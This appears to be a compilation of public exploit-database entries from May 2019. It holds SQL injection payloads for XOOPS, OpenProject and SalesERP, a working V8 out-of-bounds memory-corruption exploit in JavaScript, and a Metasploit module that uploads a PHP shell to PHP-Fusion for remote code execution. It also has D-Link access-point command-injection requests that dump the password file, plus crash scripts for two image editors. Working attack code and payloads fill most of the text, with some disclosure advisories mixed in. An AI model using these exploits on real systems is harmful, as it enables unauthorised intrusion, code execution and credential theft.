[+] Sql Injection on XOOPS CMS v.2.5.9 [+] Date: 12/05/2019 [+] Risk: High [+] CWE Number : CWE-89 [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: https://xoops.org/ [+] Contact: [email protected] [+] Tested on: Windows 7 and Gnu/Linux [+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;) [+] Exploit : http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection] [+] EOF

<!-- Since commit https://chromium.googlesource.com/v8/v8.git/+/c22bb466d8934685d897708119543d099b9d2a9a turbofan supports inlining calls to array.includes and array.indexOf. The logic of the function is roughly: 1. Check the set of possible Maps of the array type (with NodeProperties::InferReceiverMaps). 2. If they are all fast arrays, find the correct CSA builtin to handle the fast path (`Callable const callable = search_variant == SearchVariant::kIndexOf ? GetCallableForArrayIndexOf(kind, isolate()) : GetCallableForArrayIncludes(kind, isolate());`). 3. Load the array length and call the builtin. The builtin will assume that the array is a FastArray with packed (dense) elements and directly search linearly through the backing memory. The issue here is that NodeProperties::InferReceiverMaps doesn't necessarily guarantee that the object will always have the inferred Map. In case it can't prove that the objects will always have the inferred Maps it will return kUnreliableReceiverMaps: // Walks up the {effect} chain to find a witness that provides map // information about the {receiver}. Can look through potentially // side effecting nodes. enum InferReceiverMapsResult { kNoReceiverMaps, // No receiver maps inferred. kReliableReceiverMaps, // Receiver maps can be trusted. kUnreliableReceiverMaps // Receiver maps might have changed (side-effect), // but instance type is reliable. }; static InferReceiverMapsResult InferReceiverMaps( JSHeapBroker* broker, Node* receiver, Node* effect, ZoneHandleSet<Map>* maps_return); In which case the caller is responsible for guarding any optimizations based on the inferred Maps (e.g. by adding MapChecks). However, in this case the calling function fails to do so. As such, if the array is changed to dictionary mode before the inlined function call, the CSA builtin will read data out-of-bounds. The following sample, found through fuzzing, triggers this case: function v7(v8,v11) { function v14(v15,v16) { } // Transition to dictionary mode in the final invocation. const v17 = v11.__defineSetter__(v8, v14); // Will then read OOB. const v18 = v11.includes(1234); return v18; } v7([], []); v7([], []); %OptimizeFunctionOnNextCall(v7); v7([], []); const v57 = v7(String(0x1000000), []); Note: the commit introducing this vulnerability does not appear to be included in the stable Chrome release yet. --> <script> var conv_ab = new ArrayBuffer(8); var conv_f64 = new Float64Array(conv_ab); var conv_u64 = new BigUint64Array(conv_ab); BigInt.prototype.to_float = function() { conv_u64[0] = this; return conv_f64[0]; }; BigInt.prototype.hex = function() { return '0x'+this.toString(16); }; Number.prototype.to_int = function() { conv_f64[0] = this; return conv_u64[0]; } Number.prototype.hex = function() { return this.to_int().hex(); } let ab = undefined; function leak(i, smi_arr, float_arr) { let high_bytes = 0; smi_arr.__defineSetter__(i, ()=>{}); ab = new ArrayBuffer(2<<26); let smi_boundary = [1, 1, 1, 1]; for (high_bytes = 0; high_bytes < 0xffff; high_bytes++) { smi_boundary[0] = high_bytes; let idx = smi_arr.indexOf(high_bytes, 20); if (idx == 20) { break; } } float_arr.__defineSetter__(i, ()=>{}); let tmp = new Uint32Array(ab); let float_boundary = [1.1, 1.1, 1.1, 1.1]; let start = (BigInt(high_bytes)<<32n).to_float(); let end = ((BigInt(high_bytes)<<32n)+0x1000000n).to_float(); let step = 0x1000n.to_float(); for (let j = start; j < end; j += step) { float_boundary[0] = j; if (float_arr.indexOf(j, 30) == 30) { return [j, smi_boundary, float_boundary, tmp]; } } } for (let i = 0; i < 10; i++) { leak('', [1], [1.1]); } let res = leak('100000', [1], [1.1]); if (res == undefined) { location.reload(); return; } let ab_addr = res[0].to_int(); console.log(`Buf at ${ab_addr.hex()}`); let u64 = new BigUint64Array(ab); function write_map(offset, type) { u64[offset/8n + 0x0n] = 0x12345n; u64[offset/8n + 0x1n] = 0x190000002900a804n | (type << 32n); u64[offset/8n + 0x2n] = 0x92003ffn; // bitfield 3 u64[offset/8n + 0x3n] = 0x41414141n; // prototype u64[offset/8n + 0x4n] = 0x41414141n; // constructor or back ptr u64[offset/8n + 0x5n] = 0n; // transistions or proto info u64[offset/8n + 0x6n] = 0x41414141n; // instance descriptors u64[offset/8n + 0x7n] = 0n; // layout descriptor u64[offset/8n + 0x8n] = 0x41414141n; // dependent code u64[offset/8n + 0x9n] = 0n; // prototype validity cell } // SPACE_SIZE = 1<<18 // LARGE_OBJ_SIZE = (1<<17) +1 const SPACE_SIZE = 1n<<19n; const SPACE_MASK = 0xffffffffffffffffn ^ (SPACE_SIZE-1n); let space_start_addr = (ab_addr & SPACE_MASK) + SPACE_SIZE; let space_start_off = space_start_addr - ab_addr; console.log(`Space start: ${space_start_addr.hex()}`); let free_mem = space_start_addr + 4096n; function page_round(addr) { if ((addr & 0xfffn) == 0n) { return addr; } return (addr + 0x1000n) & 0xfffffffffffff000n; } function u64_offset(addr) { return (addr - ab_addr) / 8n; } class V8String { constructor(type, data) { let size = BigInt(data.length)*8n; this.addr = free_mem; free_mem += page_round(size); this.map = free_mem; free_mem += page_round(0x9n*8n); this.off = u64_offset(this.addr); u64[this.off] = this.map|1n; for (let i = 0n; i < data.length; i++) { u64[this.off + 1n + i] = data[i]; } let map_off = u64_offset(this.map); u64[map_off + 0x0n] = 0x12345n; u64[map_off + 0x1n] = 0x190000002900a804n | (type << 32n); u64[map_off + 0x2n] = 0x92003ffn; // bitfield 3 u64[map_off + 0x3n] = 0x41414141n; // prototype u64[map_off + 0x4n] = 0x41414141n; // constructor or back ptr u64[map_off + 0x5n] = 0n; // transistions or proto info u64[map_off + 0x6n] = 0x41414141n; // instance descriptors u64[map_off + 0x7n] = 0n; // layout descriptor u64[map_off + 0x8n] = 0x41414141n; // dependent code u64[map_off + 0x9n] = 0n; // prototype validity cell } } class ConsString extends V8String { constructor(size, left, right) { super(0x29n, [(size<<32n) | 0x00000003n, left|1n, right|1n]); } } class SliceString extends V8String { constructor(parent_string, offset, len=0x100n) { super(0x2bn, [(len<<32n) | 0x00000003n, parent_string|1n, offset<<32n]); } } class SeqString extends V8String { constructor(data) { super(0x08n, [(BigInt(data.length*8) << 32n | 0xdf61f02en)].concat(data)); } } // object in young generation == space+8 has one of these bits set: 0x18 u64[space_start_off/8n + 0x1n] = 0x18n; LEAK_STRING_SZ = 0x1; let seq_string = new SeqString([0x4141414141414141n]); let root_string = new ConsString(BigInt(LEAK_STRING_SZ), seq_string.addr, seq_string.addr); function foo(i, arr, to_search, to_copy) { arr.__defineSetter__(i, ()=>{}); let a = [1.1, to_copy]; let boundary = [to_search]; return [arr.indexOf(to_search), a, boundary]; } for (let i = 0; i < 100000; i++) { foo('', [Array], '', 1.1); } function doit(to_search, to_copy) { return foo('100000', [Array], to_search, to_copy)[0]; } doit('A'.repeat(LEAK_STRING_SZ), (root_string.addr|1n).to_float()); let corrupted_array = [1.1, 1.2, 1.3]; console.log(`string at = ${u64[root_string.off+2n].hex()}`); let corrupted_array_addr = u64[root_string.off+2n]+0x40n; let backing_store_sz_addr = corrupted_array_addr + 0x38n; GC_STRING_SZ = 0x30000000; u64[space_start_off/8n + 0x0n] = 0x1234n; // object in young generation == space+8 has one of these bits set: 0x18 u64[space_start_off/8n + 0x1n] = 0xff000n; // marking bitmap pointer u64[space_start_off/8n + 0x2n] = backing_store_sz_addr + 4n - (0x70n*0x4n); u64[space_start_off/8n + 0x6n] = space_start_addr; // incremental_marking ptr u64[space_start_off/8n + 0xf7n] = space_start_addr; seq_string = new SeqString([0x4141414141414141n]); root_string = new ConsString(BigInt(GC_STRING_SZ), seq_string.addr, seq_string.addr); doit('A'.repeat(GC_STRING_SZ), (root_string.addr|1n).to_float()); corrupted_array[100] = 1.1; console.log('=== OOB array leak ==='); for (let i = 0; i < 100; i++) { console.log(corrupted_array[i].hex()); } </script>

SEC Consult Vulnerability Lab Security Advisory < 20190510-0 > ======================================================================= title: Unauthenticated SQL Injection vulnerability product: OpenProject vulnerable version: 5.0.0 - 8.3.1 fixed version: 8.3.2 & 9.0.0 CVE number: CVE-2019-11600 impact: Critical homepage: https://www.openproject.org found: 2019-04-17 by: T. Soo (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "OpenProject is the leading open source project management software. Support your project management process along the entire project life cycle: From project initiation to closure." Source: https://www.openproject.org/ Business recommendation: ------------------------ The vendor provides a patch which should be applied immediately. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: ----------------------------------- An SQL injection vulnerability has been identified in the web "activities API". An unauthenticated attacker could successfully perform an attack to extract potentially sensitive information from the database if OpenProject is configured not to require authentication for API access. Proof of concept: ----------------- Requesting the following URL will trigger a time delay as a proof of concept for exploiting the blind SQL injection: http://<host>/api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(7777%3d7777 Vulnerable / tested versions: ----------------------------- The vulnerability has been identified in OpenProject version 8.3.1 which was the most current version at the time of discovery. According to the vendor all versions between 5.0.0 and 8.3.1 are affected. Older versions (< 5.0.0) are not vulnerable. Vendor contact timeline: ------------------------ 2019-04-30: Contacting vendor through [email protected] 2019-04-30: A patch is published in version 8.3.2 2019-05-06: Vendor publishes further details 2019-05-10: Release of security advisory Solution: --------- The vendor provides a patched version 8.3.2 and a security notice with further information: https://www.openproject.org/release-notes/openproject-8-3-2 https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ Workaround: ----------- None Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Thanaphon Soo / @2019

=========================================================================================== # Exploit Title: SalesERP v.8.1 SQL Inj. # Dork: N/A # Date: 13-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp # Version: v8.1 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: ERP is a Modern and responsvie small Business management system. It is developed by PHP and Codeginiter framework. It is design and develop for thinking shop, small business, company and any types of business.Here has accounting, management, invoice,user and data analysis. =========================================================================================== # POC - SQLi # Parameters : customer_id, product_id # Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199 # POST Method : http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL Inject Here] # POST Method : http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: SalesERP v.8.1 SQL Inj. # Dork: N/A # Date: 13-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp # Version: v8.1 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: ERP is a Modern and responsvie small Business management system. It is developed by PHP and Codeginiter framework. It is design and develop for thinking shop, small business, company and any types of business.Here has accounting, management, invoice,user and data analysis. =========================================================================================== # POC - SQLi # Parameters : supplier_name # Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' # POST Method : http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: SalesERP v.8.1 SQL Inj. # Dork: N/A # Date: 13-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp # Version: v8.1 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: ERP is a Modern and responsvie small Business management system. It is developed by PHP and Codeginiter framework. It is design and develop for thinking shop, small business, company and any types of business.Here has accounting, management, invoice,user and data analysis. =========================================================================================== # POC - SQLi # Parameters : supplier_name # Attack Pattern : 1260781%27 oR if(length(0x454d49524f474c55)>1,sleep(3),0) --%20 # POST Method : http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here] ===========================================================================================

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => "PHP-Fusion < 9.03.00 - 'Edit Profile' Remote Code Execution", 'Description' => %q( This module exploits command execution vulnerability in PHP-Fusion 9.03.00 and prior versions. It is possible to execute commands in the system with ordinary user authority. No need admin privilage. There is almost no control in the avatar upload section in the profile edit area. Only a client-based control working with javascript. (Simple pre-check) If we do not care about this control, the desired file can be sent to the server via Interception-Proxies. The module opens the meterpreter session for you by bypassing the controls. ), 'License' => MSF_LICENSE, 'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module ], 'References' => [ ['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details ['URL', 'https://www.php-fusion.co.uk'], ['URL', 'https://github.com/php-fusion/PHP-Fusion/commit/943432028b9e674433bb3f2a128b2477134110e6'] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Automatic', {}]], 'Privileged' => false, 'DisclosureDate' => "May 11 2019", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, "Base PHP-Fusion directory path", '/']), OptString.new('USERNAME', [true, "Username to authenticate with", '']), OptString.new('PASSWORD', [true, "Password to authenticate with", '']) ] ) end def exec res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "images","avatars", "#{@shell}") # shell url }) end ## # Login and cookie information gathering ## def login(uname, pass, check) # 1st request to get fusion_token res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "home.php") }) cookie = res.get_cookies @fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0] # 2nd request to login res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'home.php'), 'cookie' => cookie, 'vars_post' => { 'fusion_token' => @fustoken, 'form_id' => 'loginform', 'user_name' => uname, 'user_pass' => pass, 'login' => '' } ) cookie = res.get_cookies location = res.redirection.to_s if res && res.code == 302 && location.include?('login.php?error') fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}") else return cookie end return nil end ## # Upload malicious file // payload integration ## def upload_shell(cookie, check) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), 'cookie' => cookie }) ncookie = cookie + " " + res.get_cookies # gathering all cookie information res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), 'cookie' => ncookie }) # fetch some necessary post data informations fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0] userid = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0] userhash = res.body.split("userhash' value='")[1].split("' style")[0] usermail = res.body.split("user_email' value='")[1].split("' >")[0] # data preparation to delete priv avatar delete = Rex::MIME::Message.new delete.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"') delete.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"') delete.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"') delete.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"') delete.add_part('1', nil, nil, 'form-data; name="delAvatar"') delete.add_part("#{userid}", nil, nil, 'form-data; name="user_id"') delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"') delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"') delete.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"') deld = delete.to_s res = send_request_cgi({ 'method' => 'POST', 'data' => deld, 'agent' => 'Mozilla', 'ctype' => "multipart/form-data; boundary=#{delete.bound}", 'cookie' => ncookie, 'uri' => normalize_uri(target_uri.path, "edit_profile.php") }) # priv avatar deleted. res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), 'cookie' => cookie }) ncookie = cookie + " " + res.get_cookies # recheck cookies res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "edit_profile.php"), 'cookie' => ncookie }) # They changed. fetch again... fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0] userid = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0] userhash = res.body.split("userhash' value='")[1].split("' style")[0] usermail = res.body.split("user_email' value='")[1].split("' >")[0] # The "php" string must be removed for bypass.We can use "<?" pay = payload.encoded.split("/**/")[1] fname = Rex::Text.rand_text_alpha_lower(8) + ".php" @shell = "#{fname}" # data preparation to upload new avatar pdata = Rex::MIME::Message.new pdata.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"') pdata.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"') pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"') pdata.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"') pdata.add_part('1', nil, nil, 'form-data; name="delAvatar"') pdata.add_part("<?" + pay, 'image/png', nil, "form-data; name=\"user_avatar\"; filename=\"#{fname}\"") pdata.add_part("#{userid}", nil, nil, 'form-data; name="user_id"') pdata.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"') pdata.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"') data = pdata.to_s res = send_request_cgi({ 'method' => 'POST', 'data' => data, 'agent' => 'Mozilla', 'ctype' => "multipart/form-data; boundary=#{pdata.bound}", 'cookie' => ncookie, 'uri' => normalize_uri(target_uri.path, "edit_profile.php") }) location = res.redirection.to_s if res && res.code == 302 && location.include?('error') fail_with(Failure::NoAccess, 'Error occurred during uploading!') else print_status("Trying to upload #{fname}") return true end end ## # Exploit controls and information ## def exploit cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) print_good("Authentication was successful with user: #{datastore['USERNAME']}") if upload_shell(cookie, true) print_good("Control was bypassed. Harmful file upload successfully!") exec end end ## # The end of the adventure (o_O) // AkkuS ## end

Document Title: =============== D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration) Product & Service Introduction: =============================== The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP. Affected Product(s): ==================== Product: D-Link DWL-2600AP (Web Interface) Exploitation Technique: ======================= Local Severity Level: =============== HIGH CVE: CVE-2019-20499 CVE: CVE-2019-20500 CVE: CVE-2019-20501 Base Score (CVSS): =============== 7.8 =============== Request Method(s): [+] POST URL Path : [+] /admin.cgi?action=config_restore Vulnerable POST Form Data Parameter: [+] configRestore [+] configServerip =========================== Device Firmware version : [+] 4.2.0.15 Hardware Version : [+] A1 Device name : [+] D-Link AP Product Identifier : [+] WLAN-EAP Proof of Concept (PoC): ======================= The security vulnerability can be exploited by local authenticated attackers. there is no input validation on the POST Form Data Parameter "configRestore" and the Form Data Parameter "configServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes. The attacker has to know the credentials in order to access the Panel . For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot2.jpg . --- PoC Session Logs --- POST /admin.cgi?action=config_restore HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 357 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; User-Agent: Xxxxxxxx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost/admin.cgi?action=config_restore Accept-Encoding: gzip, deflate Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E ------WebKitFormBoundary4ZAwHsdySFjwNXxE Content-Disposition: form-data; name="optprotocol" up ------WebKitFormBoundary4ZAwHsdySFjwNXxE Content-Disposition: form-data; name="configRestore" ;whoami; ------WebKitFormBoundary4ZAwHsdySFjwNXxE Content-Disposition: form-data; name="configServerip" ;cat /var/passwd;cat /var/passwd ------WebKitFormBoundary4ZAwHsdySFjwNXxE-- ----------->Response-----------> HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 /usr/bin/tftp: option requires an argument -- r BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary. Usage: tftp [OPTIONS] HOST [PORT] Transfer a file from/to tftp server Options: -l FILE Local FILE -r FILE Remote FILE -g Get file -p Put file -b SIZE Transfer blocks of SIZE octets sh: whoami: not found sh: whoami: not found root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash nobody:x:99:99:nobody:/:/bin/false Note : for testing put the values in the fields like this : ;command1;same_command1;command2;command2 ----+Discovered By Raki Ben Hamouda----+ Document Title: =============== D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration) Product & Service Introduction: =============================== The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP. Affected Product(s): ==================== Product: D-Link DWL-2600AP (Web Interface) Exploitation Technique: ======================= Local Severity Level: =============== HIGH Base Score (CVSS): =============== 7.8 =============== Request Method(s): [+] POST URL Path : [+] /admin.cgi?action=config_save Vulnerable POST Form Data Parameter: [+] configBackup [+] downloadServerip ========================== Device Firmware version : [+] 4.2.0.15 Hardware Version : [+] A1 Device name : [+] D-Link AP Product Identifier : [+] WLAN-EAP Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote or local authenticated attackers. there is no input validation on the POST Form Data Parameter "configBackup" and the Form Data Parameter "downloadServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes. The attacker has to know the credentials in order to access the Panel . For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot3.jpg . --- PoC Session Logs --- POST /admin.cgi?action=config_save HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 114 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Xxxxxxxx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost/admin.cgi?action=config_save Accept-Encoding: gzip, deflate Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd ----------->Response-----------> HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 /usr/bin/tftp: option requires an argument -- r BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary. Usage: tftp [OPTIONS] HOST [PORT] Transfer a file from/to tftp server Options: -l FILE Local FILE -r FILE Remote FILE -g Get file -p Put file -b SIZE Transfer blocks of SIZE octets sh: whoami: not found sh: whoami: not found sh: .xml: not found root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash nobody:x:99:99:nobody:/:/bin/false Note : for testing put the values in the fields like this : ;command1;same_command1;command2;etc... ----+Discovered By Raki Ben Hamouda----+ Document Title: =============== D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware) Product & Service Introduction: =============================== The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP. Affected Product(s): ==================== Product: D-Link DWL-2600AP (Web Interface) Exploitation Technique: ======================= Local Severity Level: =============== HIGH Base Score (CVSS): =============== 7.8 =============== Request Method(s): [+] POST URL Path : [+] /admin.cgi?action=upgrade Vulnerable POST Form Data Parameter: [+] firmwareRestore [+] firmwareServerip =========================== Device Firmware version : [+] 4.2.0.15 Hardware Version : [+] A1 Device name : [+] D-Link AP Product Identifier : [+] WLAN-EAP Proof of Concept (PoC): ======================= The security vulnerability can be exploited by local authenticated attackers. there is no input validation on the POST Form Data Parameter "firmwareRestore" and the Form Data Parameter "firmwareServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes. The attacker has to know the credentials in order to access the Panel . For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot1.jpg . --- PoC Session Logs --- POST /admin.cgi?action=upgrade HTTP/1.1 Host: localhost Connection: keep-alive Content-Length: 525 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; User-Agent: xxxxxxxxw Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost/admin.cgi?action=upgrade Accept-Encoding: gzip, deflate Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E ------WebKitFormBoundaryBy0MsFaBOhdU6YJL Content-Disposition: form-data; name="optprotocol" up ------WebKitFormBoundaryBy0MsFaBOhdU6YJL Content-Disposition: form-data; name="firmwareRestore" ;whoami;whoami ------WebKitFormBoundaryBy0MsFaBOhdU6YJL Content-Disposition: form-data; name="firmwareServerip" ;cat /var/passwd;cat /var/passwd ------WebKitFormBoundaryBy0MsFaBOhdU6YJL Content-Disposition: form-data; name="update.device.packet-capture.stop-capture" up ------WebKitFormBoundaryBy0MsFaBOhdU6YJL-- ----------->Response-----------> HTTP/1.0 200 OK Content-Type: text/html; charset=UTF-8 /usr/bin/tftp: option requires an argument -- r BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary. Usage: tftp [OPTIONS] HOST [PORT] Transfer a file from/to tftp server Options: -l FILE Local FILE -r FILE Remote FILE -g Get file -p Put file -b SIZE Transfer blocks of SIZE octets sh: whoami: not found sh: whoami: not found root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash nobody:x:99:99:nobody:/:/bin/false Note : for testing put the values in the fields like this : ;command1;same_command1;command2;etc... ----+Discovered By Raki Ben Hamouda----+

# -*- coding: utf-8 -*- # Exploit Title: Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC) # Date: 13/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.pixarra.com # Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbselfiestudio_install.exe # Version: 2.17 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "Selfie_resize.py", it will create a new file "PoC.txt" # 2.- Copy the text from the generated PoC.txt file to clipboard # 3.- Open Selfie Studio # 4.- Go to 'Image' > 'Resize Image...' # 5.- Paste clipboard in the 'New Width/New Height' field # 6.- Click OK # 7.- Crashed buffer = "\x41" * 1000 f = open ("PoC.txt", "w") f.write(buffer) f.close()

# -*- coding: utf-8 -*- # Exploit Title: TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC) # Date: 13/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www.pixarra.com # Software Link http://www.pixarra.com/uploads/9/4/6/3/94635436/tbrusha.exe # Version: 24.06 # Tested on: Windows 10 # Proof of Concept: # 1.- Run the python script "TwistedBrush _resize.py", it will create a new file "PoC.txt" # 2.- Copy the text from the generated PoC.txt file to clipboard # 3.- Open TwistedBrush Pro Studio # 4.- Go to 'Image' > 'Resize Image...' # 5.- Paste clipboard in the 'New Width/New Height' field # 6.- Click OK # 7.- Crashed buffer = "\x41" * 1000 f = open ("PoC.txt", "w") f.write(buffer) f.close()